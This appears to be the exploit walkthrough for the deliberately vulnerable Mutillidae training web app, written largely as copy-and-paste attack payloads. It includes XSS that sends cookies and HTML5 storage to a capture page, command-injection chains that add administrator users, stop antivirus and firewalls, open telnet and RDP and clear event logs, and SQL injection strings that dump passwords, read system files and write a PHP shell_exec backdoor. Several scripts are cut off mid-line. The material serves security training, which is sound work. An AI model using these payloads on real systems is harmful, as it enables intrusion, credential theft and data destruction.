Topics
Installation
XAMPP
VM
Samurai - Bootable DVD
Samurai Installation
Custom Bootable DVD
Mutillidae Uses
1. Teach web developers how to write secure code
2. Teach web developers what exploits may be possible
3. Teach web developers insecure coding patterns
4. Demonstrate to DBAs what exploits may be possible
5. Demonstrate to management what exploits may be possible
--------------------
Demonstration
--------------------
Pen Testing Methodology (CEH version)
Recon
Scanning (Discover hosts, ports, services, internal network map, Enumerating user names)
Gaining Access
Maintaining Access
Cover Tracks
----------------------------------------
BEEF Framework
----------------------------------------
Put this text into the add-to-my-blog as a blog entry:
Most developers do not understand how dangerous XSS can be
----------------------------------------
Grendel Scan
----------------------------------------
Backtrack 5:
Change directory to /pentest/web/grendel-scan/.
Run grendel.sh to pull up GUI.
Provide target URL.
Provide non-existent output directory.
Configure plug-ins.
Run scan.
When scan is done, click terminate scan.
Report will be generated.
----------------------------------------
RatProxy
----------------------------------------
To scan generally:
Backtrack 5:
Capture Data: /usr/bin/ratproxy -w ~/pentests/scan-results/mutillidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d 192.168.56.101 -p 8088 -lextscgj
Generate Report: ratproxy-report.sh ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html
To find XSS:
Backtrack 5:
Capture Data: /usr/bin/ratproxy -w ~/pentests/scan-results/mutillidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d 192.168.56.101 -p 8088 -x
Generate Report: ratproxy-report.sh ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html
----------------------------------------
SQLMAP
----------------------------------------
*** CONFIRMED! ***
python sqlmap.py --url="http://192.168.56.101/mutillidae/index.php?page=view-someones-blog.php" --data="author=6C57C4B5-B341-4539-977B-7ACB9D42985A&view-someones-blog-php-submit-button=View+Blog+Entries" --level=1 --beep --dump
----------------------------------------
HTML 5 - Injecting XSS into JSON
----------------------------------------
Page: pen-test-tool-lookup.php
Beginner: Pop up an alert box to show injection worked
Unencoded: "}} );alert(1);//
Complete Injection: "}} )%3balert(1)%3b//
Prefix: "}} )%3b
Payload: alert(1)%3b
Suffix: //
Copy and Paste: "}} )%3balert(1)%3b//
Intermediate: Steal cookie with redirection
Unencoded:"}} );document.location="http://localhost/mutillidae/capture-data.php?cookie=" + document.cookie;//
Prefix:"}} )%3b
Payload:document.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b
Suffix://
Complete Injection: "}} )%3bdocument.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b//
Copy and Paste:
"}} )%3bdocument.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b//
Professional: Steal cookies with XHR injection
--------------------------------------------------------------------------------
Generic XHR using GET and XMLHttpRequest to steal cookies
- prefix and suffix as neccesary
- This is optimized for Firefox which has XMLHttpRequest. Some newer IE will as well.
NOTE: During Reconnassaince, study your target to determine what kind of browser
they have so the scripts can be tailored and testing for those browsers.
--------------------------------------------------------------------------------
This is a "UDP-style GET". We fire and forget but cannot know if succeeded or failed. Perfect for using against savvy users.
Copy and Paste:
--------------------------------------
URL Encoded Version
--------------------------------------
Prefix: "}} )%3b
Payload: var+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d
Suffix: //
Complete Injection: "}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d//
Copy and Paste:
"}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d//
--------------------------------------------------------------------------------
HTML 5 - Local and session storage - setting values
--------------------------------------------------------------------------------
Setting Test Values for HTML5 Storage
// You can use these statements to set some test values.
localStorage.setItem("key1","value1");
localStorage.setItem("key2","value2");
sessionStorage.setItem("key1","value1");
sessionStorage.setItem("key2","value2");
--------------------------------------------------------------------------------
HTML 5 - Local and session storage - Reading values
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Reading current HTML5 storage from local browser
--------------------------------------------------------------------------------
Copy and Paste:
// JavaScript Alert Box Method
// window.document.write method
Copy and Paste both scripts (DOM injection version) - TESTED SUCCESSFULLY
DANGER: DONT MOUSEOVER
// Fireug console.log() or console.debug() method -
// NOTE: This version must be executed in the Firebug console. The script tags are not needed.
try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i
localStorage.setItem("AccountNumber","123456");
sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3");
sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");
sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");
Copy and Paste script to add values - TESTED SUCCESSFULLY
Copy and Paste script to read values (Alert box version)
Copy and Paste both scripts (Cross Site Scripting version - Reflected) - TESTED SUCCESSFULLY
Copy and Paste both scripts (Cross Site Scripting version - Persistent) - TESTED SUCCESSFULLY
NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database.
Copy and Paste both scripts (DOM injection version) - TESTED SUCCESSFULLY
DANGER: DONT MOUSEOVER
Copy and Paste both scripts (Firebug console version) - TESTED SUCCESSFULLY
try{localStorage.setItem("AccountNumber","789456");sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3");sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");}catch(e){alert(e.message);}try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;ilocalStorage.setItem("NewSessionToken","This was set by a XSS."); var node=window.document.getElementById("idSessionStorageTableBody"); while(node.hasChildNodes()){node.removeChild(node.firstChild)}; init();
--------------------------------------------------------------------------------
HTML 5 - Local and session storage - Altering values
--------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
Over-writting Storage (Possible Session Fixation) - Set or change current HTML5 values in own browser
----------------------------------------------------------------------------------------------
Copy and Paste all three scripts (Firebug console version) - TESTED SUCCESSFULLY
(first script reads, second script overwrites, thrid script reads again)
try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;iDANGER: DONT MOUSEOVER
----------------------------------------------------------------------------------------------
Over-writing Storage (Possible Session Fixation) - Set or change another users HTML5 values
----------------------------------------------------------------------------------------------
Example JavaScript
Refelcted (First Order) Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version)
(first script reads, second script overwrites, thrid script reads again):
Peristent (Stored, Second Order) Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version)
(first script reads, second script overwrites, thrid script reads again):
NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database.
DOM injected Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version)
(first script reads, second script overwrites, thrid script reads again):
DANGER: WHATEVER YOU DO, FOR CRYING OUTLOUD PLEEAASSEEEE DONT MOUSEOVER
--------------------------------------------------------------------------------
HTML 5 - Local and session storage - Deleting values
--------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
Deleting own HTML5 Storage
----------------------------------------------------------------------------------------------
Copy and Paste all three scripts (Firebug console version) - TESTED SUCCESSFULLY
(first script reads, second script deletes, thrid script reads again)
try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;iDANGER: DONT MOUSEOVER
----------------------------------------------------------------------------------------------
Deleting another users HTML5 Storage
----------------------------------------------------------------------------------------------
Example JavaScript
Refelcted (First Order) Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version)
(first script reads, second script overwrites, thrid script reads again):
Peristent (Stored, Second Order) Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version)
(first script reads, second script overwrites, thrid script reads again):
NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database.
DOM injected Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version)
(first script reads, second script overwrites, thrid script reads again):
DANGER: WHATEVER YOU DO, FOR CRYING OUTLOUD PLEEAASSEEEE DONT MOUSEOVER
--------------------------------------------------------------------------------
Deleting values to HTML5 Storage and re-displaying page - PRO VERSION
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
HTML 5 - Local and session storage - Stealing values
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Stealing another users HTML5 Storage: Testing
--------------------------------------------------------------------------------
Script to test stealing Local Storage. Inject this into a cross-site script
vulneraility. Add a prefix and suffix as neccesary.
// XSS to steal local storage and session storage
Copy and Paste:
--------------------------------------------------------------------------------
Steal HTML5 storage with redirection: Intermediate
--------------------------------------------------------------------------------
Copy and Paste - Reflected Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste - Persistent Cross Site Script - TESTED SUCCESSFULLY
NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database.
--------------------------------------------------------------------------------
Steal HTML5 storage with XHR injection: Professional
--------------------------------------------------------------------------------
Generic XHR using GET and XMLHttpRequest to steal cookies
- prefix and suffix as neccesary
- This is optimized for Firefox which has XMLHttpRequest. Some newer IE will as well.
NOTE: During Reconnassaince, study your target to determine what kind of browser
they have so the scripts can be tailored and testing for those browsers.
--------------------------------------------------------------------------------
This is a "UDP-style GET". We fire and forget but cannot know if succeeded or failed. Perfect for using against savvy users.
Collect the HTML5 storage first, then send the information to a capture page.
Copy and Paste
Reflected Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste
Peristent (Stored, Second Order) Cross Site Script - TESTED SUCCESSFULLY
NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database.
Copy and Paste
DOM injected Cross Site Script - THIS NEEDS WORK - Causes SQL errors
DANGER: WHATEVER YOU DO, PLEEAASSEEEE DONT MOUSEOVER
-------------------------
Command Injection
-------------------------
Page: dns-lookup.php
Recon: Discover available functionality using provided help
Windows XP: && help
Linux: && --help
Linux: && man
Recon: Determine current directory
Windows XP: && dir
Linux: && pwd
Recon: Chain commands to discover driectory structure
Windows XP: && cd ../../.. && dir
Linux: && cd ../../.. && ls -l
Recon: Get a list of offerings provided by the "net.exe" program
Windows XP: && net
Recon: Get a list of services that can be started or stopped
Windows XP: && net start
Windows XP: && net stop
Scanning: Get machine network settings, hostname, DNS servers, subnet mask, etc.
Windows XP: && ipconfig /all
Linux: && ifconfig
Scanning: Discover hosts on network
Windows XP: && ping -n 1 192.168.56.102
Linux: && ping -c 1 192.168.56.102
Scanning: Enumerate Current user
Windows XP: && set
Linux: && whoami
Scanning: Enumerate computers, users, groups, AD computers, AD users, AD groups
Windows XP: && net view [/domain]
Windows XP: && net user [/domain]
Windows XP: && net localgroup [/domain]
Gaining Access: Add user
Windows XP: && net user /add
Linux: useradd
Gaining Access: Delete user
Windows XP: && net user /delete
Maintain Access: Get Windows Service Names
Windows: sc query
Maintain Access: kill AV
net stop
Maintain Access: kill firewall
Windows XP SP3: net stop netsvcs
Maintain Access: Kill AV/protective services or open backdoor services
Windows XP: net stop
Windows XP: && net start telnet
Windows XP: && net stop telnet
Cover Tracks: Clear logs
Windows XP: && wevtutil cl
Convering Tracks: Database Expolits via Command Injection
Linux (Samurai): 192.168.1.1; mysql �user=root �password=samurai �execute=�DROP TABLE accounts� owasp10
Recon: Explore Database Files
Windows XP: && cd c:/xampp/mysql && dir
------------------------------------------------------------------------------------------------------------
Command Injection: Enable Windows Telnet Service (Windows XP SP3)
------------------------------------------------------------------------------------------------------------
NOTE: Similar to Meterpreter run gettelnet
List all services (sc query state= all)
whatever && sc query state= all
Check if service is running (sc query tlntsvr)
whatever && sc query tlntsvr
Configure telnet service to "demand" (sc config tlntsvr start= demand)
whatever && sc config tlntsvr start= demand
Start tlntsvr service (sc start tlntsvr)
whatever && sc start tlntsvr
Add user (net user /add)
whatever && net user /add
Add Telnet users group (net localgroup TelnetClients /add)
whatever && net localgroup TelnetClients /add
Add users to Administrators group (net localgroup Administrators /add)
whatever && net localgroup Administrators /add
Add Telnet user to group (net localgroup TelnetClients /add)
whatever && net localgroup TelnetClients /add
Allow firewall access (netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=)
whatever && netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=
----------------------------
One combined injection:
----------------------------
whatever && sc config tlntsvr start= demand && sc start tlntsvr && net user root toor /add && net localgroup TelnetClients /add && net localgroup Administrators root /add && net localgroup TelnetClients root /add && netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101
------------------------------------------------------------------------------------------------------------
Command Injection: Enable Windows XP SP3 and similar Remote Desktop Terminal Service
------------------------------------------------------------------------------------------------------------
Check if service running (sc query termservice)
Configure service from "disabled" to "manual"(sc config termservice start= demand)
Start service (sc start termservice)
Enable Terminal Services (reg add "hklm\system\currentcontrolset\control\terminalserver" /v fdenytsconnections /t reg_dword /d 0 /f)
Enable Terminal Services (reg add "hklm\system\currentcontrolset\control\terminalserver" /v TSEnabled /t reg_dword /d 1 /f)
Check if service listening (netstat -na | find "3389")
Add user (net user /add)
Add user to group (net localgroup "Remote Desktop Users" /add)
Configure firewall to allow RDP (netsh firewall set service type=remotedesktop mode=enable scope=custom addresses=)
-------------------------
SQL Injection
-------------------------
Recon: Returns a string that indicates the MySQL server version
Page: user-info.php
Field: Username
Value: ' union select null,VERSION() AS username,null,null --
' union select null,null,null,version() --
Recon: Returns a string that indicates the current database name
Page: user-info.php
Field: Username
Value: ' union select null,DATABASE() AS username,null,null --
Recon: Returns a string that indicates the current database username
Page: user-info.php
Field: Username
Value: ' union select null,USER() AS username,null,null --
Recon: Extract table names from database
Page: user-info.php
Field: Username
' union select null,table_schema AS username,table_name AS password,null from INFORMATION_SCHEMA.TABLES--
Recon: Extract table columns from database using a single field
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', table_schema, table_name, column_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS--
Recon: Extract views from database (Doesnt work in MySQL 5.1.8)
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', table_schema, table_name, view_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS--
Recon: Extract triggers from database
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', trigger_schema, trigger_name) AS username,null,null from INFORMATION_SCHEMA.TRIGGERS--
Recon: Extract routines/procs from database
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', routine_schema, routine_name, '(', routine_type, ')') AS username,null,null from INFORMATION_SCHEMA.ROUTINES--
Recon: Extract metadata from database
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', table_schema, table_name, column_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS union select null,concat_ws('.', routine_schema, routine_name, routine_type, routine_body) AS username,null,null from INFORMATION_SCHEMA.ROUTINES union select null,concat_ws('.', table_schema, table_name, view_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS union select null,concat_ws('.', trigger_schema, trigger_name) AS username,null,null from INFORMATION_SCHEMA.TRIGGERS--
Recon/Scanning: Get specifications on database software
Page: user-info.php
Field: Username
Value: ' union select null, database(), current_user(), version() --
Gaining Access: Extract passwords from user table
Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --
Maintaining Access:
Covering Tracks:
Page: login.php
Gaining Access: Using SQL Injection
' or 1=1 --
Inserting new user using insert injection to bypass any protections. This example inserts a cross site script.
Page: Register.php
Field: Username
backdoor','password','') --
Note: Kind of pointless but still fun
Using advanced techniques: Select Concat Char
Page: user-info.php
This allows injection to select arbitrary text. This can be useful to bypass filters and WAFs.
' UNION ALL SELECT null,CONCAT(CHAR(112, 97, 115, 115, 119, 111, 114, 100)),null,null --
Using advanced techniques: Select Using IFNULL to search for columns
Page: user-info.php
' UNION ALL SELECT null,IFNULL(CAST(username AS CHAR),CHAR(32)),IFNULL(CAST(password AS CHAR),CHAR(32)),null FROM accounts --
Using advanced techniques: Open files on target operating system
Page: user-info.php
Field: username
Values:
' union select null, LOAD_FILE('../README') AS username, null, null--
' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts') AS username, null, null--
' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\inf\\cpu.inf') AS username, null, null--
' union select null, LOAD_FILE('mysql_error.log'), null, null--
' union select null, LOAD_FILE('..\\..\\..\\htdocs\\mutillidae\\index.php'), null, null--
Using advanced techniques: Writing files to operating system
Page: user-info.php
Field: username
Values:
' union select null,null,null,'";echo shell_exec($_REQUEST["pCommand"]);echo ""; ?>' INTO DUMPFILE '..\\..\\htdocs\\mutillidae\\backdoor.php' --
";
echo shell_exec($_REQUEST["pCommand"]);
echo "";
?>
";echo shell_exec($_REQUEST["pCommand"]);echo ""; ?>
Using advanced techniques: Insert Injection
Technique: SQL Insert Injection
Page: add-to-your-blog.php
Field: blog
Value: BARK','2003-12-31 01:02:03') --
--------------------------------------------------
Blind SQL Injection
--------------------------------------------------
Recon: Blind SQL Injection/Brute Forcing values
' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null --
' union select null, null, null, IF(((SELECT count(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_name = 'user') > 0), sleep(5), sleep(0)) --
' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null --
' union Select null, sleep(5) --
Page: login.php
Technique: Blind SQL Injection - Timing
Field: username
Value (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --
Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1
Page: login.php
Technique: Blind SQL Injection - True and False Values
Field: username
True Value (Using Proxy): ' or 1=1 --
False Value (Using Proxy): ' and 1=0 --
Examine responses to see if they are different
------------------------------------------------------------------------------------------
Broken Authentication and Session Management - Escalating privileges
------------------------------------------------------------------------------------------
Gaining Access: Using insecure client-side authentication tokens
Page: Any page
Tool: Web Developer Toolbar
Note what cookies the site has by default
Create a test account
Login using test account
Check what cookies the site has after authentication
Logout
Verify auth cookies are gone or get rid of them
Create a new cookie based on the original auth cookie, but with different value
Gaining Access: Using insecure client-side authentication tokens
Page: Any page
Tool: Cookies Manager+ version 1.5.1 (verified with Firefox 4.0.1)
Note what cookies the site has by default
Create a test account
Login using test account
Check what cookies the site has after authentication
Differential Analysis: Change the value of the original auth cookie
Work backwards until admin account is found
------------------------------------------------------------------------------------------
Broken Authentication and Session Management - Bypass Authorization Control
------------------------------------------------------------------------------------------
Gaining Access: Using SQL injection
Page: login.php
Field: Username
Value: ' or 1=1 --
Gaining Access: Using SQL injection
Page: login.php
Field: Username
Value: ' --
------------------------------------------------------------
Insecure Direct Object Reference - Accessing system files
------------------------------------------------------------
Step 1: Recon: Obtain list of files
Possible Technique: Use command injection
Page: dns-lookup.php
Value (Windows): && dir /w
Value (Linux): && pwd && ls -l
Possible Techniques: Use robots.txt
Possible Techniques: Use directory browsing
Possible Techniques: Use directory brute-forcing
Step 2: Gaining Access: Retrive system files
Page: source-viewer.php
Technique: Use proxy to change value, Use parent directory to bypass jails
Tool: Tamper Data, Paros, WebScarab, Burp
Field: phpfile
Value: , ../../../boot.ini, ..\..\..\WINDOW\System32\drivers\etc\hosts, ../../../etc/passwd
-----------------------------
Cross Site Scripting
-----------------------------
Page: add-to-your-blog.php
Field: blog contents
Value:
HTTP Header: Browser User Agent String
Tool: User Agent Switcher
Value:
Sorry, please login again
Username Password
Defense: Encoding
Defense When certain tokens allowed: Mapping
Page: add-to-your-blog.php
Field: blog contents
Tool: Burp-Suite
Value:
Defense: Encoding
Page: add-to-your-blog
Field: blog contents
Value:
-----------------------------
Cross Site Request Forgery
-----------------------------
Page: add-to-your-blog, view-someones-blog
Tool: HTTPFox (to view forged request)
Force someone to add a blog without consent:
Dancing with the stars results
Force someone to log out:
How to improve your Facebook status
Force someone to add a blog without consent (Credit: Udit Bajaj):
CECS 566 Test 2 solutions!
Force someone to register without their consent:
Hello World
Force someone to register without their consent:
Here is the same example using XHR rather than the "onmouseover" event:
------------------------------------------------------------------------------------
Sample to perform cross-site script on the Add to Your Blog that will
perform CSRF on the User Poll
------------------------------------------------------------------------------------
Vote for nmap. I know you will.
-------------------------
Security Misconfiguration
-------------------------
Improper Error Handling:
Page: login.php
Field: username
Value:
Result: Error gives SQL exception
---------------------------------
Insecure Direct Object References
---------------------------------
Page: source-viewer.php
Field: phpfile
Value (Windows XP): c:\boot.ini, C:\WINDOWS\system32\drivers\etc\hosts
Tool: netcat, tamper data, paros, webscarab, burp
Use netcat or hackbar to send in post data:
phpfile=c:\boot.ini&source-file-viewer-php-submit-button="View File"
phpfile=C:\WINDOWS\system32\drivers\etc\hosts&source-file-viewer-php-submit-button="View File"
Alternative: Use proxy to change value of phpfile to system file
---------------------------------
Insecure Cryptographic Storage
---------------------------------
Extract passwords from system:
Page: user-info.php
Technique: Direct SQL injection
Field: username
Value: ' or 1=1 --
Page: user-info.php
Technique: Indirect SQL injection
Field: username
Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --
Page: login.php
Technique: Blind SQL Injection
Field: username
Value (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --
Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1
---------------------------------
Failure to Restrict URL Access
---------------------------------
Page: robots.txt
Technique: Security Misconfiguration, Design Flaw
Recon: List Files
Technique: Shoulder surfing
Recon: List Files
Technique: Steal Bookmarks
Recon: List Files
Technique: Dump client cache
Recon: List Files
Page: dns-lookup.php
Technique: Command Injection
Field: hostname
Scanning: View Source Code
Page: dns-lookup.php
Technique: Command Injection
Field: hostname
Value: && type config.inc (then see source because PHP code doesnt show in browser)
Gaining Access: View restricted page
Page: Any (i.e. - http://localhost/mutillidae/config.inc, http://localhost/mutillidae/passwords/accounts.txt)
Technique: Type in URL
------------------------------------------
Insufficient Transport Layer Protection
------------------------------------------
Gaining Access: Intercept clear text credentials
Page: login.php
Tool: Use any proxy (Paros, Tamper Data) or sniffer (Wireshark, TCPDump, Snort, etc.)
Fields: Username and Password
------------------------------------------
Unvalidated redirects and forwards
------------------------------------------
Page: credits.php
Technique: Phishing
Tool: Any proxy, netcat, hackbar
Field: forwardurl
Value: any URI
Page: credits.php
Technique: Horizontal Application Attack, Restricted URL Access, Authroization Bypass
Tool: Hackbar, anything that can change the URL query parameters
Field: forwardurl
Value: http://localhost/xampp
--------------------------------------------
Information Asset Protection - Cache Control
--------------------------------------------
Recon: Grab leaked company information
Page: index.php, all
Technique: View local cache
Tool: Firefox about:cache, Internet Explorer Tools-->Options-->General Tab-->Browser History Settings-->View Files
Defenses: cache control headers
--------------------------------------------
Information Asset Protection - Framing
--------------------------------------------
Gaining Access: Cross Frame Scripting/Click-jacking
Page: index.php, all
Tecnique: Frame page, use overlay
Tool (to view defenses): HTTPFox
Defense: x-frame-options, frame busters
----------------------------------------------
Information Asset Protection - Leaked Comments
----------------------------------------------
Page: index.php
Technique: View Source
Tool: View Source, Sniffer (Wireshark), HTTPFox
Defense: Use framework comment tags to trap comments on the app server
----------------------------------------------
Log Injection
----------------------------------------------
Page: show-log.php
Technique: Figure out what fields are logged, which of those the client controls, and inject those fields with SQL injection, HTML injection, XSS, XSRF, etc.
Defense: Logs should be output encoded
--------------------------------------------------------------------------------
Generic XHR to steal cookies (prefix and suffix as necessary)
--------------------------------------------------------------------------------